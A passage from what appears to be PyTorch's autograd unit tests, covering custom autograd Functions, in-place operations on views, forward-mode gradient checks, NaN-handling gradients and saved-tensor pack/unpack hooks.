a = a.narrow(0, 0, 2)
else:
a = a.clone()
b = a.clone()
return b.select(0, 0)
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
a, = ctx.saved_tensors
res = torch.zeros_like(a)
res.select(0, 0).copy_(grad)
return res, None
fn_id_to_inplace_on_view_err_msg = {
"one_output": ("Output 0 of IdOneOutputBackward is a view and is being "
"modified inplace. This view was created inside a custom Function"),
"two_output": ("Output 0 of IdTwoOutputBackward is a view and is being modified inplace."
" This view is the output of a function that returns multiple views."),
"view_of_temp": ("Output 0 of ViewOfTempBackward is a view and is being "
"modified inplace. This view was created inside a custom Function")
}
for fn_id in ["one_output", "two_output", "view_of_temp"]:
for inplace in [True, False]:
for make_view in [True, False]:
# Used for special casing the tests below
output_is_a_view = (make_view or fn_id == "view_of_temp")
def fn(a, b):
# never modify a, b inplace for gracheck
a = a.clone()
b = b.clone()
if fn_id == "two_output":
tmp1, tmp2 = IdTwoOutput.apply(a, b, make_view)
if inplace:
tmp1 += 3
tmp2 += 3
else:
tmp1 = tmp1 + 3
tmp2 = tmp2 + 3
tmp = tmp1 * tmp2
else:
if fn_id == "one_output":
tmp = IdOneOutput.apply(a, b, make_view)
else:
tmp = ViewOfTemp.apply(a + b, make_view)
if inplace:
tmp += 3
else:
tmp = tmp + 3
return tmp.sum()
a = torch.ones(2, dtype=dtype, requires_grad=True)
b = torch.ones(2, dtype=dtype, requires_grad=True)
err_msg = fn_id_to_inplace_on_view_err_msg[fn_id]
if not inplace or not output_is_a_view:
gradcheck(fn, (a, b), check_batched_grad=False)
# Was the custom backward called properly
bw_called[0] = 0
ga_nz[0] = True # For the case where the backward is called
if inplace and output_is_a_view:
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(a, b)
else:
fn(a, b).backward()
expected_called = 1
expected_ga_nz = True
if output_is_a_view and inplace:
expected_called = 0
self.assertTrue(bw_called[0] == expected_called)
self.assertTrue(ga_nz[0] == expected_ga_nz)
def test_autograd_simple_views_python(self):
self._do_test_autograd_simple_views_python(torch.double)
self._do_test_autograd_simple_views_python(torch.cdouble)
def test_autograd_inplace_views_creation_meta(self):
# Tests creation_meta properly handled for inplace views
class Func(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x.view_as(x)
@staticmethod
def backward(ctx, x):
return x
view_custom = Func.apply
def run_test(fn, fn_type, grad_mode_view, grad_mode_iview, requires_grad, error1, error2):
# This test checks the behavior of inplace-view functions when
# the views are created in grad mode or not
base = torch.rand(2, 3, requires_grad=requires_grad).clone()
# 1. Create a view with `grad_mode=grad_mode_view`
with torch.set_grad_enabled(grad_mode_view):
if fn_type == "multi_view":
inp = base.unbind()[0]
elif fn_type == "custom" :
inp = view_custom(base)
else:
inp = base.view_as(base)
# 2. Perform inplace view with `grad_mode=grad_mode_iview`
with torch.set_grad_enabled(grad_mode_iview):
if error1 is not None:
with self.assertRaisesRegex(RuntimeError, error1):
fn(inp)
return
else:
# If error is None, check that runs without error
fn(inp)
# 3. Do inplace on the (new) view
if error2 is not None:
with self.assertRaisesRegex(RuntimeError, error2):
inp.add_(1)
else:
# If error is None, check that runs without error
inp.add_(1)
no_grad_err = "A view was created in no_grad mode"
multi_view_err = "function that returns multiple views"
custom_err = "view was created inside a custom Function"
def run_tests(fn):
for fn_type in ("normal", "multi_view", "custom"):
for grad_mode_view in (True, False):
for grad_mode_iview in (True, False):
for requires_grad in (True, False):
error1 = None # expected error when we do inplace_view on original view
error2 = None # expected error when we do inplace on the resulting view
if requires_grad:
if not grad_mode_view and grad_mode_iview:
error1 = no_grad_err
if not grad_mode_view and not grad_mode_iview:
error2 = no_grad_err
if fn_type == "multi_view":
if grad_mode_view and grad_mode_iview:
error1 = multi_view_err
if grad_mode_view and not grad_mode_iview:
error2 = multi_view_err
if fn_type == "custom":
if grad_mode_view and grad_mode_iview:
error1 = custom_err
if grad_mode_view and not grad_mode_iview:
error2 = custom_err
run_test(fn, fn_type, grad_mode_view, grad_mode_iview, requires_grad, error1, error2)
# This list was created by logging gen_inplace_or_view_type.py
# detach_ is excluded for this test because it cannot be applied to
# views and thus does not return a view
run_tests(lambda v: v.as_strided_((1, 0), (2, 2)))
run_tests(lambda v: v.transpose_(0, 0))
run_tests(lambda v: v.t_())
run_tests(lambda v: v.squeeze_(0))
run_tests(lambda v: v.unsqueeze_(0))
run_tests(lambda v: v.swapdims_(0, 0))
run_tests(lambda v: v.swapaxes_(0, 0))
# TODO This is not the correct behavior -
# See https://github.com/pytorch/pytorch/issues/49825#issuecomment-794466627
def test_autograd_inplace_views_cross_dtype(self):
# This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
a_orig = torch.rand(3, 3, requires_grad=True, dtype=torch.complex64)
a = a_orig.clone()
b = torch.view_as_real(a)
b = b.transpose(0, 1)
b += 1
b.backward(torch.arange(0, 18, dtype=torch.float).view(3, 3, 2))
non_inplace_grad = a_orig.grad
a_orig = torch.rand(3, 3, requires_grad=True, dtype=torch.complex64)
a = a_orig.clone()
b = torch.view_as_real(a)
b.transpose_(0, 1)
b += 1
b.backward(torch.arange(0, 18, dtype=torch.float).view(3, 3, 2))
inplace_grad = a_orig.grad
# TODO: this is a bug!
# once this is fixed, it should have the transpose removed:
# self.assertEqual(non_inplace_grad, inplace_grad)
self.assertEqual(non_inplace_grad.T, inplace_grad)
def test_autograd_multiple_views_python(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This checks that multiples views in the forward are properly traced and how they
# behave with respect to inplace operations.
# This indicator is used to track how many times the backward function was called
bw_called = [0]
class ComplexView(Function):
@staticmethod
def forward(ctx, a, idx):
res = a.narrow(0, idx, 1)
res = a.select(0, idx)
ctx.save_for_backward(a)
ctx.idx = idx
return res
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
a, = ctx.saved_tensors
res = torch.zeros_like(a)
res.select(0, ctx.idx).copy_(grad)
return res, None
a = torch.ones(2, requires_grad=True)
idx = 1
bw_called[0] = 0
out = ComplexView.apply(a.clone(), idx)
out.sum().backward()
self.assertTrue(bw_called[0] == 1)
out = ComplexView.apply(a.clone(), idx)
with self.assertRaisesRegex(RuntimeError,
"Output 0 of ComplexViewBackward is a view and is being modified inplace"):
out += 1
def test_autograd_python_custom_function_inplace(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This test checks custom autograd.Function that perform inplace operations
bw_called = [0]
# I) Single output
class MyAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
return grad, grad
a = torch.ones(2, requires_grad=True)
b = torch.ones(2, requires_grad=True)
# No extra inplace
c = MyAdder.apply(a.clone(), b)
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# With extra inplace on the output
bw_called[0] = 0
c = MyAdder.apply(a.clone(), b)
c += 2
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# The input is a view
bw_called[0] = 0
c = MyAdder.apply(a.clone().view_as(a), b)
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# Should not give non-inputs to mark_dirty
class MyAdderBad(Function):
@staticmethod
def forward(ctx, a, b):
c = 3 * a
c.add_(b)
ctx.mark_dirty(c)
return c
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
grad = 3 * grad
return grad, grad
a = torch.ones(2, requires_grad=True)
b = torch.ones(2, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
MyAdderBad.apply(a.clone(), b)
self.assertEqual(len(w), 1)
# II) Multiple outputs
class MyBadAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a, a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
return ga + gab, ga + gab
# No extra inplace
bw_called[0] = 0
c, d = MyBadAdder.apply(a.clone(), b)
(c * d).sum().backward()
self.assertTrue(bw_called[0] == 1)
# With extra inplace on the output
bw_called[0] = 0
c, d = MyBadAdder.apply(a.clone(), b)
c += 2
(c * d).sum().backward()
self.assertTrue(bw_called[0] == 1)
# The input is a view
inplace_on_view_err = "your Function modifies inplace an input that is a view of another Tensor"
with self.assertRaisesRegex(RuntimeError, inplace_on_view_err):
c, d = MyBadAdder.apply(a.clone().view_as(a), b)
# III) Inplace + other op
class MyOutPlaceAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a.clone(), a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
return ga + gab, ga + 2 * gab
# We don't reuse the input
def fn(a, b):
orig_a = a.clone().view_as(a)
c, d = MyOutPlaceAdder.apply(orig_a, b)
return (c * d).sum()
bad_mark_dirty_err = "Some elements marked as dirty during the forward method were not returned as output."
with self.assertRaisesRegex(RuntimeError, bad_mark_dirty_err):
fn(a, b)
def test_named_tensor_for_complex_views(self):
names = ["batch", "height", "width", "complex"]
z = torch.ones((5, 12, 14, 2), requires_grad=True)
z_named = z.refine_names(*names)
z_complex = torch.view_as_complex(z_named.rename(None)).refine_names(*names[:-1])
z_complex.sum().backward()
self.assertEqual(z.grad, torch.view_as_real(torch.ones_like(z_complex).rename(None)))
def test_custom_function_return_view_in_nograd(self):
class Alias(Function):
@staticmethod
def forward(ctx, x):
return x[:]
@staticmethod
def backward(ctx, gx):
return gx
inp = torch.rand(2, requires_grad=True)
with torch.no_grad():
output = Alias.apply(inp)
with torch.no_grad():
expected_output = inp[:]
# Calling the custom function should operate as if we called an equivalent op
self.assertEqual(output.requires_grad, expected_output.requires_grad)
# Check that in-place modification on view throws
leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, leaf_grad_err):
output.zero_()
def test_grad_mode_restored_reentrant(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, go):
original = torch._C.is_grad_enabled()
with torch.enable_grad():
self.assertTrue(torch._C.is_grad_enabled())
foo = torch.rand(go.size(), requires_grad=True)
grad, = torch.autograd.grad(
foo ** 3, foo, grad_outputs=go
)
self.assertTrue(torch._C.is_grad_enabled())
self.assertTrue(torch._C.is_grad_enabled() == original)
return grad
inp = torch.rand(3, requires_grad=True)
# Case where original==False
MyFunction.apply(inp).sum().backward()
# Case where original==True
MyFunction.apply(inp).sum().backward(create_graph=True)
def test_power_function(self):
a = torch.tensor([0., 0., 0.])
b = torch.tensor([-1., 0., 1.], requires_grad=True)
c = torch.sum(a**b)
c.backward()
self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
s = 0
b = torch.tensor([-1., 0., 1.], requires_grad=True)
c = torch.sum(s**b)
c.backward()
self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
def test_nansum_with_nans(self):
a = torch.randn(2, 2, 2, 2, dtype=torch.double)
with torch.no_grad():
a[a < 0.2] = float('nan')
a.requires_grad = True
# No args
gradcheck(lambda x: x.nansum(), a)
gradgradcheck(lambda x: x.nansum(), a)
# Single dim
gradcheck(lambda x: x.nansum((0)), a)
gradgradcheck(lambda x: x.nansum((0)), a)
# Multi dim
gradcheck(lambda x: x.nansum((0, 2)), a)
gradgradcheck(lambda x: x.nansum((0, 2)), a)
gradcheck(lambda x: x.nansum((0, -1)), a)
gradgradcheck(lambda x: x.nansum((0, -1)), a)
# With keep-dim
gradcheck(lambda x: x.nansum((0, -1), True), a)
gradgradcheck(lambda x: x.nansum((0, -1), True), a)
def test_nansum_dtype(self):
inp = torch.randn(2, 2, 2, 2)
with torch.no_grad():
inp[inp < 0.2] = float('nan')
def test(inp, inp_dtype, out_dtype):
with torch.no_grad():
a = inp.to(inp_dtype)
a.requires_grad = True
b = torch.sum(a, dtype=out_dtype)
b.backward()
self.assertEqual(a.dtype, a.grad.dtype)
test(inp, torch.float, torch.double)
test(inp, torch.double, torch.float)
def test_nan_to_num(self):
a = torch.randn(3, 3, 3, 3, dtype=torch.double)
with torch.no_grad():
a[torch.rand_like(a) < 0.2] = float('nan')
a[torch.rand_like(a) < 0.2] = float('inf')
a[torch.rand_like(a) < 0.2] = -float('inf')
a.requires_grad = True
gradcheck(lambda x: x.nan_to_num(), a)
gradgradcheck(lambda x: x.nan_to_num(), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0, neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0, neginf=-2.0), a)
gradcheck(lambda x: x.nan_to_num(posinf=2.0, neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(posinf=2.0, neginf=-2.0), a)
gradcheck(lambda x: x.nan_to_num(neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(neginf=-2.0), a)
def test_custom_function_error(self):
class BadFw(Function):
@staticmethod
def backward(ctx, foo):
return foo
class BadBw(Function):
@staticmethod
def forward(ctx, foo):
return foo.clone()
class BadBw2(Function):
@staticmethod
def forward(ctx, foo):
return foo.clone()
@staticmethod
def backward(ctx, foo):
return foo
@staticmethod
def vjp(ctx, foo):
return foo
class BadJvp(Function):
@staticmethod
def forward(ctx, foo):
return foo.clone()
inp = torch.rand(1, requires_grad=True)
with self.assertRaisesRegex(NotImplementedError, "must implement the forward"):
BadFw.apply(inp)
with self.assertRaisesRegex(RuntimeError, "must implement either the backward"):
BadBw.apply(inp).sum().backward()
with self.assertRaisesRegex(RuntimeError, "Implementing both 'backward' and 'vjp'"):
BadBw2.apply(inp).sum().backward()
with self.assertRaisesRegex(RuntimeError, "must implement the jvp function"):
with fwAD.dual_level():
d = fwAD.make_dual(inp, torch.rand_like(inp))
res = BadJvp.apply(d)
def test_custom_function_forward_mode_view_checks(self):
flag_to_error = {
"ok": None,
"not_a_view": "jvp is not returning a view",
"not_a_view_of_inp": "jvp is not returning a view of the given",
"not_a_view_of_inp_base": "jvp is not returning a view of the same base",
}
class ViewFn(Function):
@staticmethod
def forward(ctx, foo, flag):
ctx.flag = flag
ctx.size = foo.size()
return foo.narrow(0, 0, 2)
@staticmethod
def vjp(ctx, gO):
gI = gO.new_zeros(ctx.size)
gI.narrow(0, 0, 2).copy_(gO)
return gI, None
@staticmethod
def jvp(ctx, gI, _):
res = gI.narrow(0, 0, 2)
if ctx.flag != "ok":
# Break the view in the gradients!
res = res.clone()
if ctx.flag in ["not_a_view_of_inp", "not_a_view_of_inp_base"]:
# Result should be a view, just of the wrong thing
res = res.view_as(res)
return res
inp = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
for flag, msg in flag_to_error.items():
def test_fn(inp):
if flag == "not_a_view_of_inp_base":
inp = inp.view_as(inp)
return ViewFn.apply(inp, flag)
if msg is None:
gradcheck(test_fn, inp, check_forward_ad=True)
else:
with self.assertRaisesRegex(RuntimeError, msg):
gradcheck(test_fn, inp, check_forward_ad=True)
def test_custom_function_forward_mode_inplace_checks(self):
class InplaceFn(Function):
@staticmethod
def forward(ctx, foo, flag):
ctx.mark_dirty(foo)
ctx.flag = flag
foo.mul_(2)
return foo
@staticmethod
def vjp(ctx, gO):
return 2 * gO, None
@staticmethod
def jvp(ctx, gI, _):
if ctx.flag:
# Don't do the change inplace
return 2 * gI
else:
gI.mul_(2)
return gI
inp = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
def test_fn(inp, flag):
inp = inp.clone()
return InplaceFn.apply(inp, flag)
gradcheck(test_fn, (inp, False), check_forward_ad=True)
with self.assertRaisesRegex(RuntimeError, "inplace custom Function is not modifying the forward mode gradients inplace"):
gradcheck(test_fn, (inp, True), check_forward_ad=True)
def test_custom_function_forward_mode_wrong_formula(self):
class UserFn(Function):
@staticmethod
def forward(ctx, foo, should_fail):
ctx.should_fail = should_fail
return foo * 2
@staticmethod
def vjp(ctx, gO):
return 2 * gO, None
@staticmethod
def jvp(ctx, gI, _):
if ctx.should_fail:
# Wrong gradient formula
return 3 * gI
else:
return 2 * gI
inp = torch.rand(10, dtype=torch.double, requires_grad=True)
gradcheck(UserFn.apply, (inp, False), check_forward_ad=True)
with self.assertRaisesRegex(RuntimeError, "Jacobian computed with forward mode mismatch for output 0"):
gradcheck(UserFn.apply, (inp, True), check_forward_ad=True)
def test_custom_function_local_inplace(self):
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, inp, inplace):
view = inp.clone()[:3]
if inplace:
view += 2
return view
@staticmethod
def backward(ctx, grad):
return grad, None
base = torch.rand(10, requires_grad=True)
foo = MyFn.apply(base, False)
self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
foo = MyFn.apply(base, True)
self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
def test_integer_outputs(self):
inp = torch.rand(4, requires_grad=True)
out = inp.argmax()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
out = inp.argmin()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
out = inp.argsort()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
val = torch.rand((), requires_grad=True)
out = torch.searchsorted(inp, val)
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
bins = torch.linspace(0, 1.0, steps=100, requires_grad=True)
vals = torch.rand(5, 5, requires_grad=True)
out = torch.bucketize(vals, bins)
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
val = torch.empty(5).requires_grad_()
out = val.count_nonzero()
self.assertFalse(out.requires_grad)
def assert_only_first_requires_grad(res):
if not isinstance(res, tuple):
res = (res,)
self.assertTrue(res[0].requires_grad)
for out in res[1:]:
if out is not None:
self.assertFalse(out.requires_grad)
for sort in [True, False]:
for return_inverse in [True, False]:
for return_counts in [True, False]:
res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts, dim=0)
assert_only_first_requires_grad(res)
res = torch.unique_consecutive(inp, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
res = torch.unique_consecutive(inp, return_inverse=return_inverse,
return_counts=return_counts, dim=0)
assert_only_first_requires_grad(res)
# Here we test the internal functions to make sure all of them are
# covered on top of the public API
res = torch._unique(inp, sorted=sort, return_inverse=return_inverse)
assert_only_first_requires_grad(res)
# This looks public but is actually manually deleted from the
# torch namespace in torch/functional.py
res = torch._VF.unique_dim(inp, dim=0, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
# We don't test `unique_dim_consecutive` here.
# It looks public but the python binding is actually manually disabled in
# tools/autograd/gen_python_functions.py
res = torch._unique2(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
def test_custom_function_cycle(self):
class MyFn(Function):
@staticmethod
def forward(ctx, x, metadata):
x = x.clone()
ctx.meta = metadata
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, gO):
x, = ctx.saved_tensors
self.assertEqual(x, 3.14)
self.assertEqual(ctx.meta["foo"], 3.14)
return gO * x, None
def get_refs(with_backward):
a = torch.tensor(3.14, requires_grad=True)
metadata = {}
out = MyFn.apply(a, metadata)
metadata["foo"] = out
if with_backward:
out.sum().backward()
self.assertEqual(a.grad, a)
return torch._C._WeakTensorRef(out)
with disable_gc():
ref = get_refs(False)
self.assertFalse(ref.expired())
gc.collect()
self.assertTrue(ref.expired())
# The backward clears the saved_variables but not the __dict__
with disable_gc():
ref = get_refs(True)
self.assertFalse(ref.expired())
gc.collect()
self.assertTrue(ref.expired())
def test_input_buffer_accum(self):
leaf = torch.rand(2, 2, requires_grad=True)
# An op that returns sparse gradients
ind = torch.tensor([[0, 0]], dtype=torch.long)
out2 = leaf.gather(0, ind, sparse_grad=True)
# An op that returns the gradients as-is
out1 = leaf.clone()
grad_out1_original = torch.rand_like(out1)
grad_out1 = grad_out1_original.clone()
grad_out2 = torch.rand_like(out2)
torch.autograd.backward((out1, out2), (grad_out1, grad_out2))
# Given gradients should not be modified inplace
self.assertEqual(grad_out1, grad_out1_original)
def test_no_unnecessary_unwrapping(self):
a = torch.randn(5, requires_grad=True)
a_orig = a.detach().clone()
b = a * a
c = a * b
d = torch.exp(a)
# a is leaf
self.assertIs(b.grad_fn._saved_self, a)
self.assertIs(b.grad_fn._saved_other, a)
self.assertIs(c.grad_fn._saved_self, a)
# b is not an output
self.assertIs(c.grad_fn._saved_other, b)
# d is an output
self.assertEqual(d.grad_fn._saved_result, d)
self.assertIsNot(d.grad_fn._saved_result, d)
c.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
c.grad_fn._saved_self
# a is left untouched
self.assertEqual(a, a_orig)
def test_saved_variable_version_counter(self):
a = torch.rand(2, requires_grad=True)
b = torch.exp(a)
b_unpacked = b.grad_fn._saved_result
self.assertEqual(b, b_unpacked)
self.assertEqual(b._version, b_unpacked._version)
with torch.no_grad():
b += 1
self.assertEqual(b, b_unpacked)
self.assertEqual(b._version, b_unpacked._version)
def test_saved_variable_packing_unpacking_saved_original_with_hooks(self):
# Tests that packing/unpacking a SavedVariable works correctly with user-defined hooks
# The saved_original / did_not_save_original distinction corresponds to the `save_original`
# attribute of `SavedVariable`.
def test(get_input, is_leaf):
a = get_input()
grad_fn = a.grad_fn
y = a * a
y.grad_fn._raw_saved_self.register_hooks(lambda x: 2 * x, lambda x: x / 2)
self.assertEqual(a, y.grad_fn._saved_self)
if not is_leaf:
self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
y.sum().backward()
else:
y.sum().backward()
self.assertEqual(2 * a, a.grad)
a = get_input()
grad_fn = a.grad_fn
y = a * a
y.grad_fn._raw_saved_self.register_hooks(lambda x: 2 * x, lambda x: x)
self.assertEqual(2 * a, y.grad_fn._saved_self)
if not is_leaf:
self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
y.sum().backward()
else:
y.sum().backward()
self.assertEqual(3 * a, a.grad)
# double backward
a = get_input()
grad_fn = a.grad_fn
y = a ** 3
y.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
s = torch.sum(y)
g, = torch.autograd.grad(s, (a, ), create_graph=True)
if not is_leaf:
self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
g.sum().backward()
else:
g.sum().backward()
self.assertEqual(6 * a, a.grad)
a = get_input()
y = a * a
y.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: 1)
with self.assertRaisesRegex(TypeError, "Output of saved tensor unpack_hook expected to be a Tensor"):
print(y.grad_fn._saved_self)
a = get_input()
y = a * a
with self.assertRaisesRegex(TypeError, "missing 1 required positional argument"):
y.grad_fn._raw_saved_self.register_hooks(lambda x, b: x, lambda x: x)
a = get_input()
y = a * a
with self.assertRaisesRegex(TypeError, "missing 1 required positional argument"):
y.grad_fn._raw_saved_self.register_hooks(lambda x, b: (x, b), lambda x: x)
def inplace_double(x):
x *= 2
return x
a = get_input()
t = a * a
with self.assertRaisesRegex(RuntimeError, "A saved tensor pack hook is modifying its input in place."):
t.grad_fn._raw_saved_self.register_hooks(inplace_double, lambda x: x / 2)
# leaf
test(lambda: torch.randn(5, requires_grad=True), True)
# not leaf, not output
test(lambda: (1 + torch.randn(5, requires_grad=True)), False)
def test_saved_variable_packing_unpacking_did_not_save_original_with_hooks(self):
# Tests that packing/unpacking a SavedVariable works correctly with user-defined hooks
# The saved_original / did_not_save_original distinction corresponds to the `save_original`
# attribute of `SavedVariable`.
a = torch.randn(5, requires_grad=True)
y = torch.exp(a)
y.grad_fn._raw_saved_result.register_hooks(lambda x: x, lambda x: x)
self.assertEqual(y, y.grad_fn._saved_result)
self.assertIs(y.grad_fn, y.grad_fn._saved_result.grad_fn)
y.sum().backward()
self.assertEqual(a.grad, y)
def test_saved_variable_packing_unpacking_saved_original_with_default_hooks(self):
# Tests that default hooks are properly registered, used and reset
# The saved_original / did_not_save_original distinction corresponds to the `save_original`
# attribute of `SavedVariable`.
# See also:
# - test_saved_variable_packing_unpacking_saved_original_with_hooks
def pack(x):
warnings.warn("pack")
return x
with torch.autograd.graph.saved_tensors_hooks(pack, lambda x: x):
a = torch.ones(5, requires_grad=True)
warnings.simplefilter('always')
with warnings.catch_warnings(record=True) as w:
y = a * a
# should raise two warnings from a being saved twice
self.assertEqual(len(w), 2)
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
self.assertEqual(a, y.grad_fn._saved_other)
y.sum().backward()
self.assertEqual(2 * a, a.grad)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x / 2):
a = torch.randn(5, requires_grad=True)
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
self.assertEqual(a, y.grad_fn._saved_other)
y.sum().backward()
self.assertEqual(2 * a, a.grad)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a * a
self.assertEqual(2 * a, y.grad_fn._saved_self)
self.assertEqual(2 * a, y.grad_fn._saved_other)
y.sum().backward()
self.assertEqual(4 * a, a.grad)
# Exited hooks correctly
a = torch.randn(5, requires_grad=True)
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
self.assertEqual(a, y.grad_fn._saved_other)
y.sum().backward()
self.assertEqual(2 * a, a.grad)
def test_saved_variable_packing_unpacking_did_not_save_original_with_default_hooks(self):
# See also test_saved_variable_packing_unpacking_did_not_save_original_with_hooks
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = torch.exp(a)
self.assertEqual(y, y.grad_fn._saved_result)
y.sum().backward()
self.assertEqual(a.grad, y)
def test_setting_default_saved_variable_hooks_twice_should_fail(self):
with self.assertRaisesRegex(RuntimeError, "Setting default hooks but they have already been set. "):
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
pass
def test_pack_hook_with_inplace_modification_should_fail(self):
a = torch.randn(5, requires_grad=True)
def inc(x):
x += 1
return x
with torch.autograd.graph.saved_tensors_hooks(inc, lambda x: x):
with self.assertRaisesRegex(RuntimeError, "A saved tensor pack hook is modifying its input in place."):
y = torch.exp(a)
y = torch.exp(a)
with self.assertRaisesRegex(RuntimeError, "A saved tensor pack hook is modifying its input in place."):
y.grad_fn._raw_saved_result.register_hooks(inc, lambda x: x)
def test_saving_variable_to_disk(self):
with tempfile.TemporaryDirectory() as tmp_dir:
def pack(x):
name = os.path.join(tmp_dir, str(uuid.uuid4()))
torch.save(x, name)
return name
def unpack(name):
return torch.load(name)
with torch.autograd.graph.saved_tensors_hooks(pack, unpack):
a = torch.ones(5, requires_grad=True)
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
y.sum().backward()
self.assertEqual(2 * a, a.grad)
def test_default_saved_variable_hooks_double_backward(self):
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a ** 3
s = torch.sum(y)
g, = torch.autograd.grad(s, (a, ), create_graph=True)
g.sum().backward()
self.assertEqual(6 * a, a.grad)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a ** 3
s = torch.sum(y)
g, = torch.autograd.grad(s, (a, ), create_graph=True)
g.sum().backward()
# factor 2 because only a is saved once
self.assertEqual(6 * 2 * a, a.grad)
a = torch.randn(5, requires_grad=True)
y = a ** 3
s = torch.sum(y)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
g, = torch.autograd.grad(s, (a, ), create_graph=True)
g.sum().backward()
# factor 4 because pow_backward is grad * (exp * self.pow(exp - 1))
# so grad is saved and self (i.e. a) is saved
self.assertEqual(6 * 4 * a, a.grad)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a ** 3
s = torch.sum(y)
g, = torch.autograd.grad(s, (a, ), create_graph=True)
g.sum().backward()
# combining the two above blocks: 2 * 4 = 8
# note that in that sense, a is saved twice
self.assertEqual(6 * 8 * a, a.grad)
def test_graph_save_on_cpu(self):
def test(get_input, cuda, pin_memory):
with torch.autograd.graph.save_on_cpu(pin_memory):
a = get_input()
if cuda:
a.cuda()
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
self.assertEqual(a, y.grad_fn._saved_other)
self.assertEqual(a.dtype, y.grad_fn._saved_self.dtype)
self.assertEqual(a.layout, y.grad_fn._saved_self.layout)
if y.is_sparse:
y = y.to_dense()
y.sum().backward()
self.assertEqual(2 * a, a.grad)
for cuda in [False] + ([True] if torch.cuda.is_available() else []):
for pin_memory in [True, False]:
# FloatTensor
test(lambda: torch.randn(5, requires_grad=True), cuda, pin_memory)
# DoubleTensor
test(lambda: torch.randn(5, requires_grad=True, dtype=torch.double), cuda, pin_memory)
# Sparse tensor
x = torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.]), requires_grad=True)
test(lambda: x, cuda, pin_memory)
